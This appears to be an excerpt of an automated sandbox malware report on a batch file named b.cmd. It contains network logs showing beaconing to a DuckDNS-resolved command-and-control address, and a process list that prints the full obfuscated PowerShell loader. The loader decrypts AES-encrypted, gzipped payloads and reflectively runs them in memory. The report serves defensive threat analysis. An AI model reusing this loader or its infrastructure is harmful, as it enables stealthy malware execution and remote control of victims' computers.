Oct 26, 2024 08:53:25.695092916 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:30.669593096 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:30.674987078 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:30.716490984 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:30.721997023 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:30.890307903 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:30.895745993 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:30.913281918 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:30.915218115 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:30.961652994 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.030648947 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.032233000 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:31.037547112 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.091425896 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:31.097845078 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.147691011 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.149558067 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:31.155128002 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.336532116 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:31.337966919 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:31.343267918 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:32.232135057 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:32.237940073 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:32.476799011 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:32.478538036 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:32.484210014 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:33.716537952 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:33.721971989 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:33.961008072 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:33.963068008 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:33.968420982 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.372646093 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.378168106 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.404218912 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.409580946 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.544481039 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.549896002 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.616631031 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.619425058 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.624815941 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.734612942 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.735833883 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.741413116 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.854293108 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:36.857388973 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:36.862855911 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:41.995605946 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.091217041 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:42.255604982 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:42.261184931 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.388638973 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:42.394371033 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.503843069 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.505494118 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:42.510870934 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.632949114 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:42.634493113 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:42.639906883 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.497937918 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.503344059 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.607084036 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.612476110 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.685182095 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.690548897 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.700723886 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.706073999 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.716315985 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.722532034 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.741986990 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.746689081 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.793495893 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.859064102 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.864193916 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.869528055 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.943969965 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.947376013 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.952738047 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.960275888 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.966536999 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:52.976126909 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:52.980185986 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:53.029573917 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:53.029697895 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:53.034956932 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:53.289174080 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:53.295160055 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:53.300553083 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:56.138432026 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:56.143786907 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:56.390662909 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:56.392838001 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:56.398211002 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:58.294662952 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:58.300043106 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:58.676357031 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:53:58.678257942 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:53:58.683634043 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:02.419826984 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:02.425410986 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:02.665776014 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:02.667428970 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:02.672955036 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:07.424226046 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:07.429702044 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:07.668155909 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:07.676209927 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:07.681602955 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.263371944 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.268970013 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.279028893 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.286232948 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.404128075 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.409883976 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.507499933 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.510186911 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.515589952 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.624469042 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.625811100 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.631154060 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.753562927 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:08.754877090 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:08.760255098 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:11.912868977 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:12.070501089 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:23.092231035 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:23.097599983 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:23.336560011 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:23.344228983 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:23.350161076 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:23.966766119 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:23.972095966 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:24.211210966 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:24.215004921 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:24.220797062 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.218612909 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:34.224005938 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.247741938 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:34.253061056 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.462620974 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.465447903 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:34.470735073 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.580318928 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:34.583185911 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:34.588521957 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.013351917 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:35.018740892 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.258186102 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.261598110 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:35.266958952 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.703068018 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:35.708667994 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.956947088 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:35.959914923 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:35.965531111 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:38.747857094 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:38.753483057 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:38.992547035 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:39.000264883 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:39.006123066 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:41.908904076 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:41.919712067 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:41.925263882 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:42.164751053 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:42.166456938 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:42.172024012 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.419707060 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:44.425268888 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.450861931 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:44.456346989 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.724772930 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.726260900 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:44.731694937 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.843353987 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:44.844727039 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:44.850301027 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:48.622828007 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:48.633758068 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:49.040667057 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:49.049263000 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:49.054816008 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:54.638417959 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:54.644002914 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:54.685209990 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:54.690691948 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:54.882755995 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:54.885848999 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:54.891207933 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:54.999825001 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:54:55.004059076 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:54:55.009443045 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:01.732291937 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:01.737839937 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:01.977421999 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:01.979041100 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:01.984502077 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.060333014 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.065819979 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.382703066 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.384219885 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.389631033 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.747836113 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.753365040 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.810327053 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.815933943 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.841557980 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.847023010 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.888887882 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:04.894476891 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.992424011 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:04.995620012 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:05.001777887 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.093553066 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.099329948 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:05.104799986 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.109200001 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.111332893 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:05.157582045 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.226403952 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:05.228286028 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:05.233865023 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:09.796305895 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:09.801645041 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:10.062537909 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:10.063220978 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:10.068710089 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:12.211600065 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:12.211666107 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:12.212346077 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:24.483130932 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:24.489433050 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:24.727210045 CEST	7000	49732	101.99.92.203	192.168.2.4
Oct 26, 2024 08:55:24.728281021 CEST	49732	7000	192.168.2.4	101.99.92.203
Oct 26, 2024 08:55:24.733690023 CEST	7000	49732	101.99.92.203	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 08:51:13.811105967 CEST	53297	53	192.168.2.4	1.1.1.1
Oct 26, 2024 08:51:14.825752974 CEST	53297	53	192.168.2.4	1.1.1.1
Oct 26, 2024 08:51:15.825669050 CEST	53297	53	192.168.2.4	1.1.1.1
Oct 26, 2024 08:51:16.321717024 CEST	53	53297	1.1.1.1	192.168.2.4
Oct 26, 2024 08:51:16.321732044 CEST	53	53297	1.1.1.1	192.168.2.4
Oct 26, 2024 08:51:16.321743011 CEST	53	53297	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 08:51:13.811105967 CEST	192.168.2.4	1.1.1.1	0xbed6	Standard query (0)	dcxwq1.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:51:14.825752974 CEST	192.168.2.4	1.1.1.1	0xbed6	Standard query (0)	dcxwq1.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:51:15.825669050 CEST	192.168.2.4	1.1.1.1	0xbed6	Standard query (0)	dcxwq1.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 08:51:16.321717024 CEST	1.1.1.1	192.168.2.4	0xbed6	No error (0)	dcxwq1.duckdns.org	101.99.92.203	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:51:16.321732044 CEST	1.1.1.1	192.168.2.4	0xbed6	No error (0)	dcxwq1.duckdns.org	101.99.92.203	A (IP address)	IN (0x0001)	false
Oct 26, 2024 08:51:16.321743011 CEST	1.1.1.1	192.168.2.4	0xbed6	No error (0)	dcxwq1.duckdns.org	101.99.92.203	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" "
Imagebase:	0x7ff6ca130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c \"set __=^&rem\
Imagebase:	0x7ff6ca130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"
Imagebase:	0x7ff6ca130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c \"set __=^&rem\
Imagebase:	0x7ff6ca130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 3168, Parent PID: 5496

General

Target ID:	6
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "
Imagebase:	0x7ff6ca130000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:51:02
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
